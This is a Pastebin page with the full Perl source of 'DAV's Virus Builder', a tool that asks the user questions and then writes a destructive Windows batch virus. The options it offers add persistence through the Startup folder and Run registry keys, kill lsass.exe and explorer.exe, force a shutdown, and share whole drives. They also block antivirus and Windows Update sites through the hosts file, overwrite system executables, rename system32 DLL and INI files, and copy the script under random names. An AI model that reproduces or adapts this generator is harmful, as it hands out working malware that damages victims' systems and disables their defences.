API tools faq
paste
FlyFar

Constructor.Perl.DAV.a/VirusBuilder.pl - Source Code

FlyFar
Jun 8th, 2023
111
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 9.63 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/usr/local/bin/perl
  2. # Virus Builder
  3. # by dav
  4. $vname = '';
  5. $vwriter = '';
  6. $vbsmsgtxt = '';
  7. $vtime = '';
  8.  
  9. print("*******************\n");
  10. print("DAV's Virus Builder\n");
  11. print("BAT/VIRUS\n");
  12. print("*******************\n");
  13. print("\n");
  14.  
  15. print("VirusName?\n");
  16.  chomp ($vname = <STDIN>);
  17.  print("\n");
  18. print("Author?\n");
  19.  chomp ($vwriter = <STDIN>);
  20.   print("\n");
  21.   open(FH,">virus.bat");
  22.   print FH '@echo off';
  23.   print FH "\n";
  24.   close(FH);
  25.   open(FH,">>virus.bat");
  26.   print FH "rem $vname - Virus\n";
  27.   print FH "rem by $vwriter\n";
  28.   print FH "rem ** generated with dav's virus builder v.1.0 in perl **\n";
  29.   print FH "set dav=echo\n";
  30.   print FH "set davv=copy\n";
  31.   print FH "set davvv=reg add\n";
  32.   print FH "set davvvv=del\n";
  33.   print FH "set davvvvv=net share\n";
  34.   print FH "set davvvvvv=cls\n";
  35.   print FH "set davvvvvvv=taskkill\n";
  36.   print FH "set davvvvvvvv=ren\n";
  37.   print FH "set davvvvvvvvv=call\n";
  38.   print FH "set davvvvvvvvvv=shutdown\n";
  39.   print FH "%davv% %0 %windir%\\vwin.bat > nul";
  40.   print FH "\n";
  41.   close(FH);
  42.  
  43. print("*** Startup Methods ***\n");
  44.  
  45.   print("Autostart/Startup Infect - yes/no?\n");
  46.   chomp ($vstartup = <STDIN>);
  47.   if($vstartup=~m/^(yes|ja|j|y)/i) {
  48.     open(FH,">>virus.bat");
  49.     print FH "chcp 1252 > nul";
  50.     print FH "\n";
  51.     print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\win.bat" > nul';
  52.     print FH "\n";
  53.     print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul';
  54.     print FH "\n";
  55.     close(FH); } else { print "x\n" }
  56.     print("\n");
  57.    
  58.     print("REGentry(works on all winsys) - yes/no?\n");
  59.      chomp ($regy = <STDIN>);
  60.   if($regy=~m/^(yes|ja|j|y)/i) {
  61.     open(FH,">>virus.bat");
  62.     print FH '%davvv% "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';  
  63.     print FH "\n";
  64.     print FH '%davvv% "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';  
  65.     print FH "\n";
  66.     close(FH); } else { print "x\n" }
  67.     print("\n");
  68.    
  69. print("*** Virus Main Function ***\n");
  70.  
  71.     print("Shutdown with time and comment - yes/no?\n");
  72.     chomp ($shutdown = <STDIN>);
  73.  if($shutdown=~m/^(yes|ja|j|y)/i) {
  74.     print("Seconds to restart?\n");
  75.     chomp ($vtime = <STDIN>);
  76.     print("Comment?\n");
  77.     chomp ($vcom = <STDIN>);
  78.     open(FH,">>virus.bat");
  79.     print FH "%davvvvvvvvvv% /s /f /t ";
  80.     print FH "$vtime";
  81.     print FH " ";
  82.     print FH "/c ";
  83.     print FH '"';
  84.     print FH "$vcom";
  85.     print FH '"';
  86.     print FH "\n";
  87.     close(FH); } else { print "x\n" }
  88.     print("\n");
  89.  
  90.     print("LSASS.exe and EXPLORER.exe Killer - yes/no?\n");
  91.     chomp ($lsass = <STDIN>);
  92.  if($lsass=~m/^(yes|ja|j|y)/i) {
  93.     open(FH,">>virus.bat");
  94.     print FH "%davvvvvvv% /f /im explorer.exe\n";
  95.     print FH "%davvvvvvv% /f /im lsass.exe \n";
  96.     close(FH); } else { print "x\n" }
  97.     print("\n");
  98.    
  99.     print("Net Share c:, g: ... - yes/no?\n"); 
  100.      chomp ($netshare = <STDIN>);
  101.  if($netshare=~m/^(yes|ja|j|y)/i) {
  102.     open(FH,">>virus.bat");
  103.     print FH "%davvvvv% c=c:\n";
  104.     print FH "%davvvvv% g=g:\n";
  105.     print FH "%davvvvv% f=f:\n";
  106.     print FH "%davvvvv% y=y:\n";
  107.     close(FH); } else { print "x\n" }
  108.     print("\n");
  109.    
  110.     print("kill cookies - yes/no?\n"); 
  111.      chomp ($vcookie = <STDIN>);
  112.  if($vcookie=~m/^(yes|ja|j|y)/i) {
  113.     open(FH,">>virus.bat");
  114.     print FH '%davvvvvvvv% "c:\documents and settings\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
  115.     print FH "\n";
  116.     print FH '%davvvvvvvv% "C:\Dokumente und Einstellungen\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
  117.     print FH "\n";
  118.     close(FH); } else { print "x\n" }
  119.     print("\n");
  120.  
  121.     print("infect hosts file - yes/no?\n");
  122.      chomp ($vhosts = <STDIN>);
  123.  if($vhosts=~m/^(yes|ja|j|y)/i) {
  124.      open(FH,">>virus.bat");
  125.      print FH "%dav% 127.0.0.1 www.google.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  126.      print FH "%dav% 127.0.0.1 www.google.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  127.      print FH "%dav% 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  128.      print FH "%dav% 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  129.      print FH "%dav% 127.0.0.1 www.f-secure.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  130.      print FH "%dav% 127.0.0.1 www.f-secure.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  131.      print FH "%dav% 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  132.      print FH "%dav% 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  133.      print FH "%dav% 127.0.0.1 www.nai.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  134.      print FH "%dav% 127.0.0.1 windowsupdate.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  135.      print FH "%dav% 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  136.      print FH "%dav% 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  137.      print FH "%dav% 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  138.      print FH "%dav% 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  139.      print FH "%dav% 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
  140.      print FH "%dav% 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
  141.      print FH "%davvvvvv%\n";
  142.      close(FH); } else { print "x\n" }
  143.      print("\n");  
  144.    
  145.     print("Random Population - yes/no?\n");
  146.      chomp ($ranpop = <STDIN>);
  147.  if($ranpop=~m/^(yes|ja|j|y)/i) {
  148.      open(FH,">>virus.bat");
  149.      print FH "%davv% %0 %random%.bat\n";
  150.      print FH "%davv% %0 %random%.bat\n";
  151.      print FH "%davv% %0 %random%.bat\n";
  152.      print FH "%davv% %0 %random%.bat\n";
  153.      print FH "%davv% %0 c:\\%random%.bat\n";
  154.      print FH "%davv% %0 c:\\%random%.bat\n";
  155.      print FH "%davv% %0 c:\\%random%.bat\n";
  156.      print FH "%davv% %0 c:\\%random%.bat\n";
  157.      print FH "%davvvvvv%\n";
  158.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\%random%.bat" > nul';
  159.      print FH "\n";
  160.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\%random%.bat" > nul';
  161.      print FH "\n";
  162.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\%random%.bat" > nul';
  163.      print FH "\n";
  164.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\%random%.bat" > nul';
  165.      print FH "\n";
  166.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\%random%.bat" > nul';
  167.      print FH "\n";
  168.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\%random%.bat" > nul';
  169.      print FH "\n";  
  170.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\%random%.bat" > nul';
  171.      print FH "\n";
  172.      print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\%random%.bat" > nul';
  173.      print FH "\n";
  174.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
  175.      print FH "\n";
  176.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
  177.      print FH "\n";
  178.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
  179.      print FH "\n";
  180.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
  181.      print FH "\n";
  182.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
  183.      print FH "\n";
  184.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
  185.      print FH "\n";
  186.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
  187.      print FH "\n";
  188.      print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
  189.      print FH "\n";
  190.      close(FH); } else { print "x\n" }
  191.      print("\n");
  192.    
  193.      print("infect some .exe files - yes/no?\n");
  194.      chomp ($syskiller = <STDIN>);
  195.  if($syskiller=~m/^(yes|ja|j|y)/i) {
  196.      open(FH,">>virus.bat");
  197.      print FH '%davv% %0 %windir%\\system32\\taskmgr.exe > nul';
  198.      print FH "\n";
  199.      print FH '%davv% %0 %windir%\\system32\\winlogon.exe > nul';
  200.      print FH "\n";
  201.      print FH '%davv% %0 %windir%\\system32\\svchost.exe > nul';
  202.      print FH "\n";
  203.      print FH '%davv% %0 %windir%\\system32\\calc.exe > nul';
  204.      print FH "\n";
  205.      close(FH); } else { print "x\n" }
  206.      print("\n");
  207.      
  208.       print("kill .dll .ini files (** WARNING! **) - yes/no?\n");
  209.      chomp ($syskiller1 = <STDIN>);
  210.  if($syskiller1=~m/^(yes|ja|j|y)/i) {
  211.      open(FH,">>virus.bat");
  212.      print FH '%davvvvvvvv% %0 %windir%\\system32\\*.dll *.-fUcKeD > nul';
  213.      print FH "\n";
  214.      print FH '%davvvvvvvv% %0 %windir%\\system32\\*.ini *.FuCkEd- > nul';
  215.      print FH "\n";
  216.      close(FH); } else { print "x\n" }
  217.      print("\n");
  218.      
  219.      print("VBS Messagebox - yes/no?\n");  
  220.      chomp ($vbsmsg = <STDIN>);
  221.  if($vbsmsg=~m/^(yes|ja|j|y)/i) {
  222.      print("Message?\n");
  223.      chomp ($vbsmsgtxt = <STDIN>);
  224.      open(FH,">>virus.bat");
  225.      print FH '%dav% MsgBox "';
  226.      print FH "$vbsmsgtxt";
  227.      print FH '", 16, "ViRuS!!!" > msg.vbs';
  228.      print FH "\n";
  229.      print FH "%davvvvvvvvv% msg.vbs\n";
  230.      close(FH); } else { print "x\n" }
  231.      print("\n");
  232.  
  233.      open(FH,">>virus.bat");
  234.      print FH "goto ende\n";
  235.      print FH ":ende\n";
  236.      close(FH);
  237.      print("\n");
  238.      
  239.      while ($cya ne 'exit') {
  240.      print "*** VIRUS.BAT BUILT ***\n";
  241.      print "*** DON'T SPREAD YOUR VIRUS. ***\n";
  242.      print "*** I AM NOT RESPONSIBLE FOR POSSIBLE DAMAGES OR SOMETHING ELSE. ***\n";
  243.      print "*** exit to quit ***\n";
  244.      chomp ($cya = <STDIN>);
  245.      print "\n"; }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!